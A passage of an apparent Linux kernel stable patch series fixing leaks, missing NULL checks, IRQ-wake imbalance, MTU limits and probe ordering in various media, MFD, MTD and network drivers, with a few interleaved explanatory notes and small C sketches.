+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -582,7 +582,7 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 
+ 	ret = v4l2_device_register(rkisp1->dev, &rkisp1->v4l2_dev);
+ 	if (ret)
+-		goto err_pm_runtime_disable;
++		goto err_media_dev_cleanup;
+ 
+ 	ret = media_device_register(&rkisp1->media_dev);
+ 	if (ret) {
+@@ -617,6 +617,8 @@ err_unreg_media_dev:
+ 	media_device_unregister(&rkisp1->media_dev);
+ err_unreg_v4l2_dev:
+ 	v4l2_device_unregister(&rkisp1->v4l2_dev);
++err_media_dev_cleanup:
++	media_device_cleanup(&rkisp1->media_dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(&pdev->dev);
+ 	return ret;
+@@ -637,6 +639,8 @@ static int rkisp1_remove(struct platform_device *pdev)
+ 	media_device_unregister(&rkisp1->media_dev);
+ 	v4l2_device_unregister(&rkisp1->v4l2_dev);
+ 
++	media_device_cleanup(&rkisp1->media_dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/verisilicon/hantro_drv.c b/drivers/media/platform/verisilicon/hantro_drv.c
+index 08840ba313e7a..69a2442f31223 100644
+--- a/drivers/media/platform/verisilicon/hantro_drv.c
++++ b/drivers/media/platform/verisilicon/hantro_drv.c
+@@ -813,6 +813,8 @@ static int hantro_add_func(struct hantro_dev *vpu, unsigned int funcid)
+ 
+ 	if (funcid == MEDIA_ENT_F_PROC_VIDEO_ENCODER) {
+ 		vpu->encoder = func;
++		v4l2_disable_ioctl(vfd, VIDIOC_TRY_DECODER_CMD);
++		v4l2_disable_ioctl(vfd, VIDIOC_DECODER_CMD);
+ 	} else {
+ 		vpu->decoder = func;
+ 		v4l2_disable_ioctl(vfd, VIDIOC_TRY_ENCODER_CMD);
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 30e650edaea8a..b2da48936e3f1 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -759,6 +759,9 @@ const struct v4l2_ioctl_ops hantro_ioctl_ops = {
+ 	.vidioc_g_selection = vidioc_g_selection,
+ 	.vidioc_s_selection = vidioc_s_selection,
+ 
++	.vidioc_decoder_cmd = v4l2_m2m_ioctl_stateless_decoder_cmd,
++	.vidioc_try_decoder_cmd = v4l2_m2m_ioctl_stateless_try_decoder_cmd,
++
+ 	.vidioc_try_encoder_cmd = v4l2_m2m_ioctl_try_encoder_cmd,
+ 	.vidioc_encoder_cmd = vidioc_encoder_cmd,
+ };
+diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c
+index 727e6268567f7..f1feccc28bf05 100644
+--- a/drivers/media/usb/cx231xx/cx231xx-core.c
++++ b/drivers/media/usb/cx231xx/cx231xx-core.c
+@@ -1024,6 +1024,7 @@ int cx231xx_init_isoc(struct cx231xx *dev, int max_packets,
+ 	if (!dev->video_mode.isoc_ctl.urb) {
+ 		dev_err(dev->dev,
+ 			"cannot alloc memory for usb buffers\n");
++		kfree(dma_q->p_left_data);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -1033,6 +1034,7 @@ int cx231xx_init_isoc(struct cx231xx *dev, int max_packets,
+ 		dev_err(dev->dev,
+ 			"cannot allocate memory for usbtransfer\n");
+ 		kfree(dev->video_mode.isoc_ctl.urb);
++		kfree(dma_q->p_left_data);
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-context.c b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+index 14170a5d72b35..1764674de98bc 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-context.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+@@ -268,7 +268,8 @@ void pvr2_context_disconnect(struct pvr2_context *mp)
+ {
+ 	pvr2_hdw_disconnect(mp->hdw);
+ 	mp->disconnect_flag = !0;
+-	pvr2_context_notify(mp);
++	if (!pvr2_context_shutok())
++		pvr2_context_notify(mp);
+ }
+ 
+ 
+diff --git a/drivers/mfd/intel-lpss.c b/drivers/mfd/intel-lpss.c
+index cfbee2cfba6b0..c50387600b819 100644
+--- a/drivers/mfd/intel-lpss.c
++++ b/drivers/mfd/intel-lpss.c
+@@ -301,8 +301,8 @@ static int intel_lpss_register_clock_divider(struct intel_lpss *lpss,
+ 
+ 	snprintf(name, sizeof(name), "%s-div", devname);
+ 	tmp = clk_register_fractional_divider(NULL, name, __clk_get_name(tmp),
++					      0, lpss->priv, 1, 15, 16, 15,
+ 					      CLK_FRAC_DIVIDER_POWER_OF_TWO_PS,
+-					      lpss->priv, 1, 15, 16, 15, 0,
+ 					      NULL);
+ 	if (IS_ERR(tmp))
+ 		return PTR_ERR(tmp);
+diff --git a/drivers/mfd/syscon.c b/drivers/mfd/syscon.c
+index bdb2ce7ff03b9..6196724ef39bb 100644
+--- a/drivers/mfd/syscon.c
++++ b/drivers/mfd/syscon.c
+@@ -102,6 +102,10 @@ static struct syscon *of_syscon_register(struct device_node *np, bool check_clk)
+ 	}
+ 
+ 	syscon_config.name = kasprintf(GFP_KERNEL, "%pOFn@%pa", np, &res.start);
++	if (!syscon_config.name) {
++		ret = -ENOMEM;
++		goto err_regmap;
++	}
+ 	syscon_config.reg_stride = reg_io_width;
+ 	syscon_config.val_bits = reg_io_width * 8;
+ 	syscon_config.max_register = resource_size(&res) - reg_io_width;
+diff --git a/drivers/misc/habanalabs/common/habanalabs_ioctl.c b/drivers/misc/habanalabs/common/habanalabs_ioctl.c
+index 43afe40966e50..1ea1ae34b7a74 100644
+--- a/drivers/misc/habanalabs/common/habanalabs_ioctl.c
++++ b/drivers/misc/habanalabs/common/habanalabs_ioctl.c
+@@ -677,7 +677,7 @@ static int sec_attest_info(struct hl_fpriv *hpriv, struct hl_info_args *args)
+ 	if (!sec_attest_info)
+ 		return -ENOMEM;
+ 
+-	info = kmalloc(sizeof(*info), GFP_KERNEL);
++	info = kzalloc(sizeof(*info), GFP_KERNEL);
+ 	if (!info) {
+ 		rc = -ENOMEM;
+ 		goto free_sec_attest_info;
+diff --git a/drivers/mmc/host/Kconfig b/drivers/mmc/host/Kconfig
+index 9b5a2cb110b3e..d84bdb69f56b0 100644
+--- a/drivers/mmc/host/Kconfig
++++ b/drivers/mmc/host/Kconfig
+@@ -1061,14 +1061,15 @@ config MMC_SDHCI_XENON
+ 
+ config MMC_SDHCI_OMAP
+ 	tristate "TI SDHCI Controller Support"
++	depends on ARCH_OMAP2PLUS || ARCH_KEYSTONE || COMPILE_TEST
+ 	depends on MMC_SDHCI_PLTFM && OF
+ 	select THERMAL
+ 	imply TI_SOC_THERMAL
+ 	select MMC_SDHCI_EXTERNAL_DMA if DMA_ENGINE
+ 	help
+ 	  This selects the Secure Digital Host Controller Interface (SDHCI)
+-	  support present in TI's DRA7 SOCs. The controller supports
+-	  SD/MMC/SDIO devices.
++	  support present in TI's Keystone/OMAP2+/DRA7 SOCs. The controller
++	  supports SD/MMC/SDIO devices.
+ 
+ 	  If you have a controller with this interface, say Y or M here.
+ 
+@@ -1076,14 +1077,15 @@ config MMC_SDHCI_OMAP
+ 
+ config MMC_SDHCI_AM654
+ 	tristate "Support for the SDHCI Controller in TI's AM654 SOCs"
++	depends on ARCH_K3 || COMPILE_TEST
+ 	depends on MMC_SDHCI_PLTFM && OF
+ 	select MMC_SDHCI_IO_ACCESSORS
+ 	select MMC_CQHCI
+ 	select REGMAP_MMIO
+ 	help
+ 	  This selects the Secure Digital Host Controller Interface (SDHCI)
+-	  support present in TI's AM654 SOCs. The controller supports
+-	  SD/MMC/SDIO devices.
++	  support present in TI's AM65x/AM64x/AM62x/J721E SOCs. The controller
++	  supports SD/MMC/SDIO devices.
+ 
+ 	  If you have a controller with this interface, say Y or M here.
+ 
+diff --git a/drivers/mtd/mtd_blkdevs.c b/drivers/mtd/mtd_blkdevs.c
+index 60b222799871e..8ee60605a6dcc 100644
+--- a/drivers/mtd/mtd_blkdevs.c
++++ b/drivers/mtd/mtd_blkdevs.c
+@@ -463,7 +463,7 @@ static void blktrans_notify_add(struct mtd_info *mtd)
+ {
+ 	struct mtd_blktrans_ops *tr;
+ 
+-	if (mtd->type == MTD_ABSENT)
++	if (mtd->type == MTD_ABSENT || mtd->type == MTD_UBIVOLUME)
+ 		return;
+ 
+ 	list_for_each_entry(tr, &blktrans_majors, list)
+@@ -503,7 +503,7 @@ int register_mtd_blktrans(struct mtd_blktrans_ops *tr)
+ 	mutex_lock(&mtd_table_mutex);
+ 	list_add(&tr->list, &blktrans_majors);
+ 	mtd_for_each_device(mtd)
+-		if (mtd->type != MTD_ABSENT)
++		if (mtd->type != MTD_ABSENT && mtd->type != MTD_UBIVOLUME)
+ 			tr->add_mtd(tr, mtd);
+ 	mutex_unlock(&mtd_table_mutex);
+ 	return 0;
+diff --git a/drivers/mtd/nand/raw/fsl_ifc_nand.c b/drivers/mtd/nand/raw/fsl_ifc_nand.c
+index 02d5001768382..bea1a7d3edd78 100644
+--- a/drivers/mtd/nand/raw/fsl_ifc_nand.c
++++ b/drivers/mtd/nand/raw/fsl_ifc_nand.c
+@@ -20,7 +20,7 @@
+ 
+ #define ERR_BYTE		0xFF /* Value returned for read
+ 					bytes when read failed	*/
+-#define IFC_TIMEOUT_MSECS	500  /* Maximum number of mSecs to wait
++#define IFC_TIMEOUT_MSECS	1000 /* Maximum timeout to wait
+ 					for IFC NAND Machine	*/
+ 
+ struct fsl_ifc_ctrl;
+diff --git a/drivers/net/amt.c b/drivers/net/amt.c
+index 2d20be6ffb7e5..ddd087c2c3ed4 100644
+--- a/drivers/net/amt.c
++++ b/drivers/net/amt.c
+@@ -11,7 +11,7 @@
+ #include <linux/net.h>
+ #include <linux/igmp.h>
+ #include <linux/workqueue.h>
+-#include <net/sch_generic.h>
++#include <net/pkt_sched.h>
+ #include <net/net_namespace.h>
+ #include <net/ip.h>
+ #include <net/udp.h>
+@@ -80,11 +80,11 @@ static struct mld2_grec mldv2_zero_grec;
+ 
+ static struct amt_skb_cb *amt_skb_cb(struct sk_buff *skb)
+ {
+-	BUILD_BUG_ON(sizeof(struct amt_skb_cb) + sizeof(struct qdisc_skb_cb) >
++	BUILD_BUG_ON(sizeof(struct amt_skb_cb) + sizeof(struct tc_skb_cb) >
+ 		     sizeof_field(struct sk_buff, cb));
+ 
+ 	return (struct amt_skb_cb *)((void *)skb->cb +
+-		sizeof(struct qdisc_skb_cb));
++		sizeof(struct tc_skb_cb));
+ }
+ 
+ static void __amt_source_gc_work(void)
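The BUILD_BUG_ON change matters because AMT stashes its private state in the tail of skb->cb[], after whatever traffic-control code stores there; sizing the guard against the smaller qdisc_skb_cb while TC actually uses tc_skb_cb could silently overflow the fixed cb area. A userspace sketch of the layout check (struct sizes here are placeholders, not the kernel's):

#include <assert.h>
#include <stddef.h>

#define SKB_CB_SIZE 48                 /* sizeof_field(struct sk_buff, cb) */

struct tc_skb_cb  { char data[28]; };  /* placeholder size, assumption */
struct amt_skb_cb { void *tunnel; };   /* driver-private state */

struct sk_buff { char cb[SKB_CB_SIZE]; };

static struct amt_skb_cb *amt_skb_cb(struct sk_buff *skb)
{
	/* The fix: reserve room for tc_skb_cb (the larger consumer), so
	 * TC paths cannot clobber AMT's state. Compile-time checked. */
	static_assert(sizeof(struct amt_skb_cb) + sizeof(struct tc_skb_cb)
		      <= SKB_CB_SIZE, "cb[] overflow");
	return (struct amt_skb_cb *)(skb->cb + sizeof(struct tc_skb_cb));
}

int main(void)
{
	struct sk_buff skb;
	return amt_skb_cb(&skb) == (void *)(skb.cb + sizeof(struct tc_skb_cb))
		? 0 : 1;
}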
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index ef1a4a7c47b23..3efd556690563 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -1119,6 +1119,8 @@ static int vsc73xx_gpio_probe(struct vsc73xx *vsc)
+ 
+ 	vsc->gc.label = devm_kasprintf(vsc->dev, GFP_KERNEL, "VSC%04x",
+ 				       vsc->chipid);
++	if (!vsc->gc.label)
++		return -ENOMEM;
+ 	vsc->gc.ngpio = 4;
+ 	vsc->gc.owner = THIS_MODULE;
+ 	vsc->gc.parent = vsc->dev;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index 2292d63a279c1..83c4659390fd5 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -130,9 +130,15 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ {
+ 	struct mlxbf_gige *priv = netdev_priv(netdev);
+ 	struct phy_device *phydev = netdev->phydev;
++	u64 control;
+ 	u64 int_en;
+ 	int err;
+ 
++	/* Perform general init of GigE block */
++	control = readq(priv->base + MLXBF_GIGE_CONTROL);
++	control |= MLXBF_GIGE_CONTROL_PORT_EN;
++	writeq(control, priv->base + MLXBF_GIGE_CONTROL);
++
+ 	err = mlxbf_gige_request_irqs(priv);
+ 	if (err)
+ 		return err;
+@@ -147,14 +153,14 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	 */
+ 	priv->valid_polarity = 0;
+ 
+-	err = mlxbf_gige_rx_init(priv);
++	phy_start(phydev);
++
++	err = mlxbf_gige_tx_init(priv);
+ 	if (err)
+ 		goto free_irqs;
+-	err = mlxbf_gige_tx_init(priv);
++	err = mlxbf_gige_rx_init(priv);
+ 	if (err)
+-		goto rx_deinit;
+-
+-	phy_start(phydev);
++		goto tx_deinit;
+ 
+ 	netif_napi_add(netdev, &priv->napi, mlxbf_gige_poll);
+ 	napi_enable(&priv->napi);
+@@ -176,8 +182,8 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
+-rx_deinit:
+-	mlxbf_gige_rx_deinit(priv);
++tx_deinit:
++	mlxbf_gige_tx_deinit(priv);
+ 
+ free_irqs:
+ 	mlxbf_gige_free_irqs(priv);
+@@ -279,7 +285,6 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	void __iomem *plu_base;
+ 	void __iomem *base;
+ 	int addr, phy_irq;
+-	u64 control;
+ 	int err;
+ 
+ 	base = devm_platform_ioremap_resource(pdev, MLXBF_GIGE_RES_MAC);
+@@ -294,11 +299,6 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	if (IS_ERR(plu_base))
+ 		return PTR_ERR(plu_base);
+ 
+-	/* Perform general init of GigE block */
+-	control = readq(base + MLXBF_GIGE_CONTROL);
+-	control |= MLXBF_GIGE_CONTROL_PORT_EN;
+-	writeq(control, base + MLXBF_GIGE_CONTROL);
+-
+ 	netdev = devm_alloc_etherdev(&pdev->dev, sizeof(*priv));
+ 	if (!netdev)
+ 		return -ENOMEM;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 227d01cace3f0..6999843584934 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -142,6 +142,9 @@ int mlxbf_gige_rx_init(struct mlxbf_gige *priv)
+ 	writeq(MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS_EN,
+ 	       priv->base + MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS);
+ 
++	writeq(ilog2(priv->rx_q_entries),
++	       priv->base + MLXBF_GIGE_RX_WQE_SIZE_LOG2);
++
+ 	/* Clear MLXBF_GIGE_INT_MASK 'receive pkt' bit to
+ 	 * indicate readiness to receive interrupts
+ 	 */
+@@ -154,9 +157,6 @@ int mlxbf_gige_rx_init(struct mlxbf_gige *priv)
+ 	data |= MLXBF_GIGE_RX_DMA_EN;
+ 	writeq(data, priv->base + MLXBF_GIGE_RX_DMA);
+ 
+-	writeq(ilog2(priv->rx_q_entries),
+-	       priv->base + MLXBF_GIGE_RX_WQE_SIZE_LOG2);
+-
+ 	return 0;
+ 
+ free_wqe_and_skb:
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+index 4c98950380d53..d231f4d2888be 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+@@ -301,6 +301,7 @@ mlxsw_sp_acl_erp_table_alloc(struct mlxsw_sp_acl_erp_core *erp_core,
+ 			     unsigned long *p_index)
+ {
+ 	unsigned int num_rows, entry_size;
++	unsigned long index;
+ 
+ 	/* We only allow allocations of entire rows */
+ 	if (num_erps % erp_core->num_erp_banks != 0)
+@@ -309,10 +310,11 @@ mlxsw_sp_acl_erp_table_alloc(struct mlxsw_sp_acl_erp_core *erp_core,
+ 	entry_size = erp_core->erpt_entries_size[region_type];
+ 	num_rows = num_erps / erp_core->num_erp_banks;
+ 
+-	*p_index = gen_pool_alloc(erp_core->erp_tables, num_rows * entry_size);
+-	if (*p_index == 0)
++	index = gen_pool_alloc(erp_core->erp_tables, num_rows * entry_size);
++	if (!index)
+ 		return -ENOBUFS;
+-	*p_index -= MLXSW_SP_ACL_ERP_GENALLOC_OFFSET;
++
++	*p_index = index - MLXSW_SP_ACL_ERP_GENALLOC_OFFSET;
+ 
+ 	return 0;
+ }
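Context for the offset dance: gen_pool_alloc() uses a return value of 0 to signal failure, so the driver seeds the pool at MLXSW_SP_ACL_ERP_GENALLOC_OFFSET and subtracts it afterwards, letting index 0 remain valid; the fix also stops writing through p_index on the failure path. A toy allocator with the same contract (the bias value and allocator are illustrative):

#include <stdbool.h>
#include <stdio.h>

#define GENALLOC_OFFSET 0x100   /* pool base; keeps index 0 != "failed" */

static unsigned long next = GENALLOC_OFFSET;

static unsigned long toy_alloc(unsigned long size, bool fail)
{
	if (fail)
		return 0;       /* the allocator's only failure signal */
	unsigned long addr = next;
	next += size;
	return addr;
}

static int table_alloc(unsigned long size, bool fail, unsigned long *p_index)
{
	unsigned long index = toy_alloc(size, fail);

	if (!index)
		return -1;      /* *p_index left untouched, as in the fix */
	*p_index = index - GENALLOC_OFFSET;
	return 0;
}

int main(void)
{
	unsigned long idx = 0xdead;

	if (table_alloc(4, true, &idx))
		printf("failed, idx untouched: %#lx\n", idx);
	if (!table_alloc(4, false, &idx))
		printf("ok, idx=%lu\n", idx);   /* 0 is a valid index */
	return 0;
}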
+diff --git a/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c b/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
+index 27b1663c476e7..64b209a0ad219 100644
+--- a/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
++++ b/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
+@@ -391,7 +391,7 @@ nla_put_failure:
+ 
+ struct rtnl_link_ops rmnet_link_ops __read_mostly = {
+ 	.kind		= "rmnet",
+-	.maxtype	= __IFLA_RMNET_MAX,
++	.maxtype	= IFLA_RMNET_MAX,
+ 	.priv_size	= sizeof(struct rmnet_priv),
+ 	.setup		= rmnet_vnd_setup,
+ 	.validate	= rmnet_rtnl_validate,
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index c2c56a5289caf..e7b70006261f7 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1965,7 +1965,7 @@ static netdev_tx_t ravb_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 	struct ravb_tstamp_skb *ts_skb;
+ 	struct ravb_tx_desc *desc;
+ 	unsigned long flags;
+-	u32 dma_addr;
++	dma_addr_t dma_addr;
+ 	void *buffer;
+ 	u32 entry;
+ 	u32 len;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac.h b/drivers/net/ethernet/stmicro/stmmac/stmmac.h
+index bdbf86cb102af..46944c02b45ed 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac.h
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac.h
+@@ -247,6 +247,7 @@ struct stmmac_priv {
+ 	u32 msg_enable;
+ 	int wolopts;
+ 	int wol_irq;
++	bool wol_irq_disabled;
+ 	int clk_csr;
+ 	struct timer_list eee_ctrl_timer;
+ 	int lpi_irq;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+index 35c8dd92d3692..f03aa8a0b8954 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+@@ -761,10 +761,16 @@ static int stmmac_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol)
+ 	if (wol->wolopts) {
+ 		pr_info("stmmac: wakeup enable\n");
+ 		device_set_wakeup_enable(priv->device, 1);
+-		enable_irq_wake(priv->wol_irq);
++		/* Avoid unbalanced enable_irq_wake calls */
++		if (priv->wol_irq_disabled)
++			enable_irq_wake(priv->wol_irq);
++		priv->wol_irq_disabled = false;
+ 	} else {
+ 		device_set_wakeup_enable(priv->device, 0);
+-		disable_irq_wake(priv->wol_irq);
++		/* Avoid unbalanced disable_irq_wake calls */
++		if (!priv->wol_irq_disabled)
++			disable_irq_wake(priv->wol_irq);
++		priv->wol_irq_disabled = true;
+ 	}
+ 
+ 	mutex_lock(&priv->lock);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index deb6e95a1bca6..8f8de14347a94 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3519,6 +3519,7 @@ static int stmmac_request_irq_multi_msi(struct net_device *dev)
+ 	/* Request the Wake IRQ in case of another line
+ 	 * is used for WoL
+ 	 */
++	priv->wol_irq_disabled = true;
+ 	if (priv->wol_irq > 0 && priv->wol_irq != dev->irq) {
+ 		int_name = priv->int_name_wol;
+ 		sprintf(int_name, "%s:%s", dev->name, "wol");
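enable_irq_wake()/disable_irq_wake() maintain a nesting count, so unbalanced calls trigger "Unbalanced IRQ wake disable" warnings; the two stmmac hunks above add a state bool — initialized to true when the IRQ is requested, since the wake source starts disarmed — so each transition happens at most once. A userspace sketch of the guard (the IRQ-wake functions are stubs):

#include <stdbool.h>
#include <stdio.h>

struct dev { bool wol_irq_disabled; };

static void enable_irq_wake(void)  { puts("enable_irq_wake"); }
static void disable_irq_wake(void) { puts("disable_irq_wake"); }

static void set_wol(struct dev *d, bool on)
{
	if (on) {
		if (d->wol_irq_disabled)   /* only arm if currently disarmed */
			enable_irq_wake();
		d->wol_irq_disabled = false;
	} else {
		if (!d->wol_irq_disabled)  /* only disarm if currently armed */
			disable_irq_wake();
		d->wol_irq_disabled = true;
	}
}

int main(void)
{
	struct dev d = { .wol_irq_disabled = true }; /* as set at request time */

	set_wol(&d, false);  /* no spurious disable_irq_wake() */
	set_wol(&d, true);   /* prints once */
	set_wol(&d, true);   /* balanced: skipped */
	return 0;
}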
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 9f2553799895d..76fabeae512db 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -54,7 +54,7 @@
+ #define AM65_CPSW_MAX_PORTS	8
+ 
+ #define AM65_CPSW_MIN_PACKET_SIZE	VLAN_ETH_ZLEN
+-#define AM65_CPSW_MAX_PACKET_SIZE	(VLAN_ETH_FRAME_LEN + ETH_FCS_LEN)
++#define AM65_CPSW_MAX_PACKET_SIZE	2024
+ 
+ #define AM65_CPSW_REG_CTL		0x004
+ #define AM65_CPSW_REG_STAT_PORT_EN	0x014
+@@ -1990,7 +1990,8 @@ am65_cpsw_nuss_init_port_ndev(struct am65_cpsw_common *common, u32 port_idx)
+ 	eth_hw_addr_set(port->ndev, port->slave.mac_addr);
+ 
+ 	port->ndev->min_mtu = AM65_CPSW_MIN_PACKET_SIZE;
+-	port->ndev->max_mtu = AM65_CPSW_MAX_PACKET_SIZE;
++	port->ndev->max_mtu = AM65_CPSW_MAX_PACKET_SIZE -
++			      (VLAN_ETH_HLEN + ETH_FCS_LEN);
+ 	port->ndev->hw_features = NETIF_F_SG |
+ 				  NETIF_F_RXCSUM |
+ 				  NETIF_F_HW_CSUM |
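The new max_mtu follows from simple framing arithmetic: the MAC's hard limit is 2024 bytes on the wire, and MTU counts only the L2 payload, so the VLAN-tagged Ethernet header (18 bytes) and the FCS (4 bytes) come off the top, leaving 2002. A quick check, using the header lengths from the kernel's if_ether.h/if_vlan.h:

#include <stdio.h>

#define VLAN_ETH_HLEN 18   /* dst MAC + src MAC + VLAN tag + ethertype */
#define ETH_FCS_LEN    4
#define AM65_CPSW_MAX_PACKET_SIZE 2024

int main(void)
{
	printf("max_mtu = %d\n",
	       AM65_CPSW_MAX_PACKET_SIZE - (VLAN_ETH_HLEN + ETH_FCS_LEN));
	return 0;               /* prints: max_mtu = 2002 */
}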
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 54a17b576eac0..7cbcf51bae924 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3302,6 +3302,7 @@ static struct phy_driver ksphy_driver[] = {
+ 	.flags		= PHY_POLL_CABLE_TEST,
+ 	.driver_data	= &ksz9021_type,
+ 	.probe		= kszphy_probe,
++	.soft_reset	= genphy_soft_reset,
+ 	.config_init	= ksz9131_config_init,
+ 	.config_intr	= kszphy_config_intr,
+ 	.handle_interrupt = kszphy_handle_interrupt,
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index 76f275ca53e9c..70d468f013383 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -813,8 +813,8 @@ static int ath11k_core_get_rproc(struct ath11k_base *ab)
+ 
+ 	prproc = rproc_get_by_phandle(rproc_phandle);
+ 	if (!prproc) {
+-		ath11k_err(ab, "failed to get rproc\n");
+-		return -EINVAL;
++		ath11k_dbg(ab, ATH11K_DBG_AHB, "failed to get rproc, deferring\n");
++		return -EPROBE_DEFER;
+ 	}
+ 	ab_ahb->tgt_rproc = prproc;
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c b/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
+index a3cefbc43e80d..2c14188f34bbc 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
+@@ -99,17 +99,6 @@ static void iwl_mvm_phy_ctxt_set_rxchain(struct iwl_mvm *mvm,
+ 		active_cnt = 2;
+ 	}
+ 
+-	/*
+-	 * If the firmware requested it, then we know that it supports
+-	 * getting zero for the values to indicate "use one, but pick
+-	 * which one yourself", which means it can dynamically pick one
+-	 * that e.g. has better RSSI.
+-	 */
+-	if (mvm->fw_static_smps_request && active_cnt == 1 && idle_cnt == 1) {
+-		idle_cnt = 0;
+-		active_cnt = 0;
+-	}
+-
+ 	*rxchain_info = cpu_to_le32(iwl_mvm_get_valid_rx_ant(mvm) <<
+ 					PHY_RX_CHAIN_VALID_POS);
+ 	*rxchain_info |= cpu_to_le32(idle_cnt << PHY_RX_CHAIN_CNT_POS);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index caaf4d52e2c64..76219486b9c2e 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -2200,7 +2200,7 @@ int iwl_mvm_flush_sta_tids(struct iwl_mvm *mvm, u32 sta_id, u16 tids)
+ 	WARN_ON(!iwl_mvm_has_new_tx_api(mvm));
+ 
+ 	if (iwl_fw_lookup_notif_ver(mvm->fw, LONG_GROUP, TXPATH_FLUSH, 0) > 0)
+-		cmd.flags |= CMD_WANT_SKB;
++		cmd.flags |= CMD_WANT_SKB | CMD_SEND_IN_RFKILL;
+ 
+ 	IWL_DEBUG_TX_QUEUES(mvm, "flush for sta id %d tid mask 0x%x\n",
+ 			    sta_id, tids);
+diff --git a/drivers/net/wireless/marvell/libertas/Kconfig b/drivers/net/wireless/marvell/libertas/Kconfig
+index 6d62ab49aa8d4..c7d02adb3eead 100644
+--- a/drivers/net/wireless/marvell/libertas/Kconfig
++++ b/drivers/net/wireless/marvell/libertas/Kconfig
+@@ -2,8 +2,6 @@
+ config LIBERTAS
+ 	tristate "Marvell 8xxx Libertas WLAN driver support"
+ 	depends on CFG80211
+-	select WIRELESS_EXT
+-	select WEXT_SPY
+ 	select LIB80211
+ 	select FW_LOADER
+ 	help
